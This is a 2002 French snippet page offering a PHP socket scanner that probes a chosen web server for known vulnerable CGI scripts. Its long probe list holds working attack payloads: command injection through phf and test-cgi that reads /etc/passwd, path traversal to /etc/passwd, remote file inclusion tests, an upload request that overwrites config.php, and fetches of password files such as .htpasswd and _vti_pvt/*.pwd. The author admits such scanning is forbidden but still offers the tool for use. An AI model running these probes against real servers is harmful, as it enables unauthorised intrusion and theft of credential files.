Scaner de failles cgi (socket)
Contenu du snippet
Ce code permet de scaner les failles CGI sur un serveur, biensur cela est interdit et doit être utilisé en local (le code est théorique)
Exécuter le script :
script.php?host=adresseserv&path=repcgi
adresseserv > Adresse du serveur
repcgi > répertoire qui contient les CGI
King 2002
www.jeuxenligne.fr.st
Exécuter le script :
script.php?host=adresseserv&path=repcgi
adresseserv > Adresse du serveur
repcgi > répertoire qui contient les CGI
Source / Exemple :
<?PHP echo "Variables :<BR>host = adresse du site<BR>path = Répertoire des script CGI (ex : /cgi-bin/)<BR>"; echo "<BR><B>King 2002</B><BR><BR>"; $cgi[] = "test-cgi?\help&0a/bin/cat%20/etc/passwd"; $cgi[] = "test-cgi?"; $cgi[] = "nph-test-cgi?"; $cgi[] = "nph-test-cgi?x"; $cgi[] = "php.cgi?/etc/passwd"; $cgi[] = "../cool-logs/mlog.html?screen=/etc/passwd"; $cgi[] = "phf?Qalias=x%0a/bin/cat%20/etc/passwd"; $cgi[] = "../index.php?url=http://www.google.com"; $cgi[] = "../index.php3?url=http://www.google.com"; $cgi[] = "../index2.php?url=http://www.google.com"; $cgi[] = "../index2.php3?url=http://www.google.com"; $cgi[] = "../main.php?url=http://www.google.com"; $cgi[] = "../main.php3?url=http://www.google.com"; $cgi[] = "../default.php?url=http://www.google.com"; $cgi[] = "../default.php3?url=http://www.google.com"; $cgi[] = "../start.php3?url=http://www.google.com"; $cgi[] = "../start.php3?url=http://www.google.com"; $cgi[] = "../index.php?file=http://www.google.com"; $cgi[] = "../index.php3?file=http://www.google.com"; $cgi[] = "../index2.php?file=http://www.google.com"; $cgi[] = "../index2.php3?file=http://www.google.com"; $cgi[] = "../main.php?file=http://www.google.com"; $cgi[] = "../main.php3?file=http://www.google.com"; $cgi[] = "../default.php?file=http://www.google.com"; $cgi[] = "../default.php3?file=http://www.google.com"; $cgi[] = "../start.php3?file=http://www.google.com"; $cgi[] = "../start.php3?file=http://www.google.com"; $cgi[] = "../index.php?page=http://www.google.com"; $cgi[] = "../index.php3?page=http://www.google.com"; $cgi[] = "../index2.php?page=http://www.google.com"; $cgi[] = "../index2.php3?page=http://www.google.com"; $cgi[] = "../main.php?page=http://www.google.com"; $cgi[] = "../main.php3?page=http://www.google.com"; $cgi[] = "../default.php?page=http://www.google.com"; $cgi[] = "../default.php3?page=http://www.google.com"; $cgi[] = "../start.php3?page=http://www.google.com"; $cgi[] = "../start.php3?page=http://www.google.com"; $cgi[] = "../index.php?action=http://www.google.com"; $cgi[] = "../index.php3?action=http://www.google.com"; $cgi[] = "../index2.php?action=http://www.google.com"; $cgi[] = "../index2.php3?action=http://www.google.com"; $cgi[] = "../main.php?action=http://www.google.com"; $cgi[] = "../main.php3?action=http://www.google.com"; $cgi[] = "../default.php?action=http://www.google.com"; $cgi[] = "../default.php3?action=http://www.google.com"; $cgi[] = "../start.php3?action=http://www.google.com"; $cgi[] = "../start.php3?action=http://www.google.com"; $cgi[] = "../scripts/tools/newdsn.exe="; $cgi[] = "../scripts/tools/dsnform.exe"; $cgi[] = "../scripts/tools/getdrvrs.exe"; $cgi[] = "../scripts/tools/mkilog.exe"; $cgi[] = "../null.htw?CiWebHitsFile=/index.asp%20&CiRestriction=none&CiHiliteType=Full"; $cgi[] = "../_vti_bin/shtml.dll"; $cgi[] = "../_vti_bin/shtml.dll/nosuch.htm"; $cgi[] = "../?PageServices"; $cgi[] = "../admin"; $cgi[] = "../administration"; $cgi[] = "../index.php%00"; $cgi[] = "../index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc"; $cgi[] = "../index.php?page=../../../../../../../../../../etc/passwd"; $cgi[] = "../index.php?sql_debug=1"; $cgi[] = "imagemap"; $cgi[] = "../whisker.htw"; $cgi[] = "../admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php&userfile_name=hacked.txt"; $cgi[] = "../?Open"; $cgi[] = "../?open"; $cgi[] = "../search/s97_cgi.exe"; $cgi[] = "../scripts/counter.exe"; $cgi[] = "../passwords.php"; $cgi[] = "../pass"; $cgi[] = "../cfide/administrator/index.cfm"; $cgi[] = "..htimage.exe"; $cgi[] = "..htimage.exe?2,2"; $cgi[] = "..imagemap.exe"; $cgi[] = "../_private/form_results.txt"; $cgi[] = "../usr/local/apache/share/htdocs/.htaccess"; $cgi[] = "../usr/local/apache/share/htdocs/.htaccess"; $cgi[] = "../scripts/../../cmd.exe"; $cgi[] = "../....../autoexec.bat"; $cgi[] = "../.htaccess"; $cgi[] = "../.html/............/autoexec.bat"; $cgi[] = "../.htpasswd"; $cgi[] = "../_AuthChangeUrl"; $cgi[] = "../_AuthChangeUrl"; $cgi[] = "../_private/form_results.txt"; $cgi[] = "../_private/orders.txt"; $cgi[] = "../_private/register.txt"; $cgi[] = "../_private/registrations.txt"; $cgi[] = "../_vti_inf.html"; $cgi[] = "../_vti_pvt/administrator.pwd"; $cgi[] = "../_vti_pvt/administrators.pwd"; $cgi[] = "../_vti_pvt/author.log"; $cgi[] = "../_vti_pvt/authors.pwd"; $cgi[] = "../_vti_pvt/service.grp"; $cgi[] = "../_vti_pvt/service.pwd"; $cgi[] = "../_vti_pvt/users.pwd"; $cgi[] = "../admisapi/fpadmin.htm"; $cgi[] = "../adsamples/config/site.csc"; $cgi[] = "../AdvWorks/equipment/catalog_type.asp"; $cgi[] = "../ASPSamp/AdvWorks/equipment/catalog_type.asp"; $cgi[] = "../bb-dnbd/bb-hist.sh"; $cgi[] = "../carbo.dll"; $cgi[] = "../catalog.nsf"; $cgi[] = "../cfappman/index.cfm"; $cgi[] = "../cfappman/index.cfm"; $cgi[] = "../cfdocs/cfmlsyntaxcheck.cfm"; $cgi[] = "../cfdocs/cfmlsyntaxcheck.cfm"; $cgi[] = "../cfdocs/exampleapp/docs/sourcewindow.cfm"; $cgi[] = "../cfdocs/exampleapp/email/getfile.cfm"; $cgi[] = "../cfdocs/examples/cvbeans/beaninfo.cfm"; $cgi[] = "../cfdocs/examples/httpclient/mainframeset.cfm"; $cgi[] = "../cfdocs/examples/parks/detail.cfm"; $cgi[] = "../cfdocs/expelval/displayopenedfile.cfm"; $cgi[] = "../cfdocs/expelval/exprcalc.cfm"; $cgi[] = "../cfdocs/expelval/openfile.cfm"; $cgi[] = "../cfdocs/expelval/sendmail.cfm"; $cgi[] = "../cfdocs/expeval/displayopenedfile.cfm"; $cgi[] = "../cfdocs/expeval/exprcalc.cfm"; $cgi[] = "../cfdocs/expeval/openfile.cfm"; $cgi[] = "../cfdocs/expeval/sendmail.cfm"; $cgi[] = "../cfdocs/root.cfm"; $cgi[] = "../cfdocs/snippets/evaluate.cfm"; $cgi[] = "../cfdocs/snippets/fileexists.cfm"; $cgi[] = "../cfdocs/snippets/fileexists.cfm"; $cgi[] = "../cfdocs/snippets/gettempdirectory.cfm"; $cgi[] = "../cfusion/cfapps/forums/data/forums.mdb"; $cgi[] = "../cfusion/cfapps/security/data/realm.mdb"; $cgi[] = "../cfusion/cfapps/security/realm_.mdb"; $cgi[] = "../cfusion/database/cfsnippets.mdb"; $cgi[] = "../cfusion/database/cypress.mdb"; $cgi[] = "../cfusion/database/smpolicy.mdb"; $cgi[] = "add_ftp.cgi"; $cgi[] = "aglimpse"; $cgi[] = "alibaba.pl"; $cgi[] = "gi-bin/alibaba.pl\|dir"; $cgi[] = "AnyForm"; $cgi[] = "AnyForm2"; $cgi[] = "archie"; $cgi[] = "architext_query.pl"; $cgi[] = "ash"; $cgi[] = "AT-admin.cgi"; $cgi[] = "AT-generate.cgi"; $cgi[] = "ax-admin.cgi"; $cgi[] = "axs.cgi"; $cgi[] = "bash"; $cgi[] = "bb-hist.sh"; $cgi[] = "bigconf.cgi"; $cgi[] = "bnbform"; $cgi[] = "bnbform.cgi"; $cgi[] = "cachemgr.cgi"; $cgi[] = "calendar"; $cgi[] = "campas"; $cgi[] = "carbo.dll"; $cgi[] = "cgimail.exe"; $cgi[] = "Cgitest.exe"; $cgi[] = "cgiwrap"; $cgi[] = "classified.cgi"; $cgi[] = "classifieds"; $cgi[] = "classifieds.cgi"; $cgi[] = "Count.cgi"; $cgi[] = "csh"; $cgi[] = "date"; $cgi[] = "day5datacopier.cgi"; $cgi[] = "day5notifier"; $cgi[] = "dbmlparser.exe"; $cgi[] = "download.cgi"; $cgi[] = "dumpenv.pl"; $cgi[] = "edit.pl"; $cgi[] = "environ.cgi"; $cgi[] = "excite"; $cgi[] = "faxsurvey"; $cgi[] = "faxsurvey"; $cgi[] = "filemail"; $cgi[] = "filemail.pl"; $cgi[] = "files.pl"; $cgi[] = "finger"; $cgi[] = "finger.cgi"; $cgi[] = "finger.pl"; $cgi[] = "flexform"; $cgi[] = "flexform.cgi"; $cgi[] = "FormHandler.cgi"; $cgi[] = "formmail.pl"; $cgi[] = "fortune"; $cgi[] = "fpexplorer.exe"; $cgi[] = "get32.exe\|dir"; $cgi[] = "glimpse"; $cgi[] = "guestbook.cgi"; $cgi[] = "guestbook.pl"; $cgi[] = "GW5"; $cgi[] = "GWWEB.EXE"; $cgi[] = "handler"; $cgi[] = "handler.cgi"; $cgi[] = "htmlscript"; $cgi[] = "htmlscript"; $cgi[] = "info2www"; $cgi[] = "input.bat"; $cgi[] = "input2.bat"; $cgi[] = "jj"; $cgi[] = "ksh"; $cgi[] = "lwgate"; $cgi[] = "LWGate.cgi"; $cgi[] = "lwgate.cgi"; $cgi[] = "MachineInfo"; $cgi[] = "mail"; $cgi[] = "maillist.pl"; $cgi[] = "man.sh"; $cgi[] = "mlog.phtml"; $cgi[] = "mylog.phtml"; $cgi[] = "nlog-smb.pl"; $cgi[] = "nph-error.pl"; $cgi[] = "nph-publish"; $cgi[] = "nph-test-cgi"; $cgi[] = "passwd"; $cgi[] = "passwd.txt"; $cgi[] = "password"; $cgi[] = "password.txt"; $cgi[] = "perl"; $cgi[] = "perl.exe"; $cgi[] = "perlshop.cgi"; $cgi[] = "pfdispaly.cgi"; $cgi[] = "phf"; $cgi[] = "phf.pp"; $cgi[] = "php"; $cgi[] = "php.cgi"; $cgi[] = "phpscan"; $cgi[] = "post-query"; $cgi[] = "ppdscgi.exe"; $cgi[] = "query"; $cgi[] = "redirect"; $cgi[] = "responder.cgi"; $cgi[] = "rguest.exe"; $cgi[] = "rksh"; $cgi[] = "rsh"; $cgi[] = "rwwwshell.pl"; $cgi[] = "sam._"; $cgi[] = "search.cgi"; $cgi[] = "search97.vts"; $cgi[] = "sendform.cgi"; $cgi[] = "sh"; $cgi[] = "snorkerz.bat"; $cgi[] = "snorkerz.cmd"; $cgi[] = "status.cgi"; $cgi[] = "survey"; $cgi[] = "survey.cgi"; $cgi[] = "tcsh"; $cgi[] = "test.bat"; $cgi[] = "test-cgi"; $cgi[] = "test-cgi.tcl"; $cgi[] = "test-env"; $cgi[] = "textcounter.pl"; $cgi[] = "tst.bat"; $cgi[] = "tst.bat\|dir"; $cgi[] = "unlg1.1"; $cgi[] = "upload.pl"; $cgi[] = "uptime"; $cgi[] = "view-source"; $cgi[] = "visadmin.exe"; $cgi[] = "visitor.exe"; $cgi[] = "w3-msql"; $cgi[] = "w3-sql"; $cgi[] = "w3tvars.pm"; $cgi[] = "wais.pl"; $cgi[] = "webdist.cgi"; $cgi[] = "webgais"; $cgi[] = "webmap.cgi"; $cgi[] = "websendmail"; $cgi[] = "wguest.exe"; $cgi[] = "whois_raw.cgi"; $cgi[] = "wrap"; $cgi[] = "wwwadmin.pl"; $cgi[] = "wwwboard.pl"; $cgi[] = "www-sql"; $cgi[] = "zsh"; $cgi[] = "../cgi-dos/args.bat"; $cgi[] = "../cgi-dos/args.cmd"; $cgi[] = "../cgi-shl/win-c-sample.exe"; $cgi[] = "../cgi-win/uploader.exe"; $cgi[] = "../cool-logs/mlog.html"; $cgi[] = "../cool-logs/mylog.html"; $cgi[] = "../database.nsf"; $cgi[] = "../database.nsf"; $cgi[] = "../domcfg.nsf"; $cgi[] = "../domlog.nsf"; $cgi[] = "../hosts.dat"; $cgi[] = "../iisadmpwd/achg.htr"; $cgi[] = "../IISADMPWD/achg.htr"; $cgi[] = "../iisadmpwd/aexp.htr"; $cgi[] = "../iisadmpwd/aexp2.htr"; $cgi[] = "../iisadmpwd/aexp2b.htr"; $cgi[] = "../iisadmpwd/aexp3.htr"; $cgi[] = "../iisadmpwd/aexp4.htr"; $cgi[] = "../iisadmpwd/aexp4b.htr"; $cgi[] = "../iisadmpwd/anot.htr"; $cgi[] = "../iisadmpwd/anot3.htr"; $cgi[] = "../iissamples/exair/howitworks/codebrws.asp"; $cgi[] = "../iissamples/sdk/asp/docs/codebrws.asp"; $cgi[] = "../log.nsf"; $cgi[] = "../manage/cgi/cgiproc"; $cgi[] = "../msadc/msadcs.dll"; $cgi[] = "../msadc/samples/adctest.asp"; $cgi[] = "../msadc/Samples/SELECTOR/codebrws.cfm"; $cgi[] = "../msadc/Samples/SELECTOR/showcode.asp"; $cgi[] = "../msads/samples/selector/showcode.asp"; $cgi[] = "../names.nsf"; $cgi[] = "../names.nsf"; $cgi[] = "../passwd"; $cgi[] = "../passwd.txt"; $cgi[] = "../password"; $cgi[] = "../password.txt"; $cgi[] = "../publisher/"; $cgi[] = "../samples/search/queryhit.htm"; $cgi[] = "../scripts/CGImail.exe"; $cgi[] = "../scripts/convert.bas"; $cgi[] = "../scripts/counter.exe"; $cgi[] = "../scripts/cpshost.dll"; $cgi[] = "../scripts/fpcount.exe"; $cgi[] = "../scripts/iisadmin/bdir.htr"; $cgi[] = "../scripts/iisadmin/ism.dll"; $cgi[] = "../scripts/iisadmin/tools/ctss.idc"; $cgi[] = "../scripts/iisadmin/tools/getdrvrs.exe"; $cgi[] = "../scripts/iisadmin/tools/mkilog.exe"; $cgi[] = "../scripts/issadmin/bdir.htr"; $cgi[] = "../scripts/perl"; $cgi[] = "../scripts/postinfo.asp"; $cgi[] = "../scripts/proxy/w3proxy.dll"; $cgi[] = "../scripts/samples/ctguestb.idc"; $cgi[] = "../scripts/samples/details.idc"; $cgi[] = "../scripts/samples/search/webhits.exe"; $cgi[] = "../scripts/tools/dsnform.exe"; $cgi[] = "../scripts/tools/getdrvrs.exe"; $cgi[] = "../scripts/tools/getdrvs.exe"; $cgi[] = "../scripts/tools/newdsn.exe"; $cgi[] = "../scripts/upload.asp"; $cgi[] = "../scripts/uploadn.asp"; $cgi[] = "../scripts/uploadx.asp"; $cgi[] = "../search"; $cgi[] = "../search97.vts"; $cgi[] = "../secure/.htaccess"; $cgi[] = "../secure/.wwwacl"; $cgi[] = "../session/adminlogin"; $cgi[] = "../showfile.asp"; $cgi[] = "../smdata.dat"; $cgi[] = "../ssi/envout.bat"; $cgi[] = "../today.nsf"; $cgi[] = "../tree.dat"; $cgi[] = "../WebSTAR"; $cgi[] = "../ws_ftp.ini"; $cgi[] = "../wwwboard/passwd.txt"; $cginumber = count($cgi); if ($host) { for ($count = 0 ; $count < $cginumber ; $count++) { $fp = fsockopen($host, 80); if(!$fp){ echo "Impossible de se connecter a $host \n"; break; } else { fputs($fp,"GET $path$cgi[$count] HTTP/1.0\n\n"); while(!feof($fp)) { $nom=fgets($fp,200); if (ereg("200 OK",$nom)) { print("<b>Faille Potentielle : $cgi[$count] </b><br>\n"); break; } else { print("Non trouvé $cgi[$count] <br> \n"); break; } } fclose($fp); } } } ?>
Conclusion :
King 2002
www.jeuxenligne.fr.st
A voir également
- Scaner de failles cgi (socket)
- Python socket timeout - Forum Python
- Socket operation on non-socket ✓ - Forum C
- Sockets de test ✓ - Forum C / C++ / C++.NET
- Php cgi ✓ - Forum PHP
- Socket php - Forum PHP
Vous n'êtes pas encore membre ?
inscrivez-vous, c'est gratuit et ça prend moins d'une minute !
Les membres obtiennent plus de réponses que les utilisateurs anonymes.
Le fait d'être membre vous permet d'avoir un suivi détaillé de vos demandes et codes sources.
Le fait d'être membre vous permet d'avoir des options supplémentaires.